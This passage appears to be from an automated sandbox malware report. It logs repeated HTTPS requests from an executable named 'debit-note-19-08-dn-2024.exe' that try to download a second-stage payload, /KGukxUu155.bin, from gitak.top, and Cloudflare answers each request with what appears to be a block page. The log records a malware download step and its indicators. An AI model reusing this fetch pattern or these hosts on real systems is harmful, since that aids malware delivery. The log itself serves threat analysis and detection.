2024-08-26 13:37:08 UTC	541	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:37:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xBVzMKlfR0%2FLMqfuJN7mwdNempjq5O3AUMADfVymwABJUtBuXHt%2F5HBHchbDI%2FuUXid3XobP44nFhqJt05gw0IEPTTQ7gcvTgxkTFs6dWcWfJInifP%2FQQBGTOvw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9436fbfce8c5c3-IAD
2024-08-26 13:37:08 UTC	828	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:37:08 UTC	1369	IN	Data Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
2024-08-26 13:37:08 UTC	1369	IN	Data Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 42 35 46 41 66 50 39 4e 33 5a 48 71 68 73 74 4f 64 73 32 6f 41 6d 4e 54 57 67 67 7a 75 6f 4f 6d 54 43 52 72 44 67 44 35 4d 73 67 2d 31 37 32 34 36 37 39 34 32 38 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 Data Ascii: <input type="hidden" name="atok" value="B5FAfP9N3ZHqhstOds2oAmNTWggzuoOmTCRrDgD5Msg-1724679428-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
2024-08-26 13:37:08 UTC	852	IN	Data Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 Data Ascii: r sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
2024-08-26 13:37:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.11.20	49846	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:37:18 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:37:19 UTC	545	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:37:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MCnukM%2FE3%2B0BcIxy%2BRuJwfh7YNh6Jw8ZyrcuJacwFoMEcxSTaYRH9Qk2y9jYArJQCzTU6KrCD%2F88GWWYPSsBlx5t9rNXP31X01b3MTP%2Fw%2BLJo5Cmx2ilnlKP5hI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94373daee92899-IAD
2024-08-26 13:37:19 UTC	824	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:37:19 UTC	1369	IN	Data Raw: 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 Data Ascii: ors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-ale
2024-08-26 13:37:19 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 53 49 52 58 72 72 46 54 6a 72 6a 67 61 6a 70 31 45 63 48 57 4a 6d 2e 30 46 55 78 6c 35 4c 50 66 34 5a 6e 4f 43 66 66 64 5a 76 38 2d 31 37 32 34 36 37 39 34 33 38 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 Data Ascii: <input type="hidden" name="atok" value="SIRXrrFTjrjgajp1EcHWJm.0FUxl5LPf4ZnOCffdZv8-1724679438-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-bt
2024-08-26 13:37:19 UTC	856	IN	Data Raw: 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 Data Ascii: rator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudf
2024-08-26 13:37:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.11.20	49847	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:37:29 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:37:29 UTC	535	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:37:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ysZmsCePjV4KrKTEKgdrGpMORH5mlE47%2FAs6Mig8BuQa6dzJ9UWldTkAW1uUAyS09n1fuSlLwuXwFAxpiexacaj5NLqzfUwaabaXx173FxYQ6uVX4NnRsm9mKjU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94377f5c303b02-IAD
2024-08-26 13:37:29 UTC	834	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:37:29 UTC	1369	IN	Data Raw: 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 20 20 Data Ascii: " /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:37:29 UTC	1369	IN	Data Raw: 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 43 4e 46 39 67 41 5f 48 74 4b 67 67 44 68 36 46 4b 68 6d 55 55 76 41 63 33 53 46 58 31 6b 37 59 2e 45 35 35 74 67 34 74 65 46 55 2d 31 37 32 34 36 37 39 34 34 39 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 Data Ascii: ut type="hidden" name="atok" value="CNF9gA_HtKggDh6FKhmUUvAc3SFX1k7Y.E55tg4teFU-1724679449-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="
2024-08-26 13:37:29 UTC	846	IN	Data Raw: 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f Data Ascii: idden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></
2024-08-26 13:37:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.11.20	49848	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:37:39 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:37:40 UTC	547	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:37:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Az9iGbnvEk0fmr04Jq0rwJk7bIIui9MbFxJSi%2F15HlwsQ2upfkQOS%2BmO%2BtaB02BnlctL2OwDs1UcMH4lxcBccqIbmXnm4gPU%2F6edh%2B%2FV%2FjBd5fEdMIFoDV4njcY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9437c12a109c2e-IAD
2024-08-26 13:37:40 UTC	822	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:37:40 UTC	1369	IN	Data Raw: 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 Data Ascii: rrors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-a
2024-08-26 13:37:40 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 46 6f 4b 4c 72 5f 64 47 75 4c 71 30 64 48 47 54 43 31 47 70 45 46 56 36 37 4b 35 6d 6c 30 44 6c 4e 5f 36 53 77 42 63 36 5f 48 49 2d 31 37 32 34 36 37 39 34 36 30 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d Data Ascii: <input type="hidden" name="atok" value="FoKLr_dGuLq0dHGTC1GpEFV67K5ml0DlN_6SwBc6_HI-1724679460-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-
2024-08-26 13:37:40 UTC	858	IN	Data Raw: 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 Data Ascii: parator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Clou
2024-08-26 13:37:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.11.20	49849	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:37:50 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
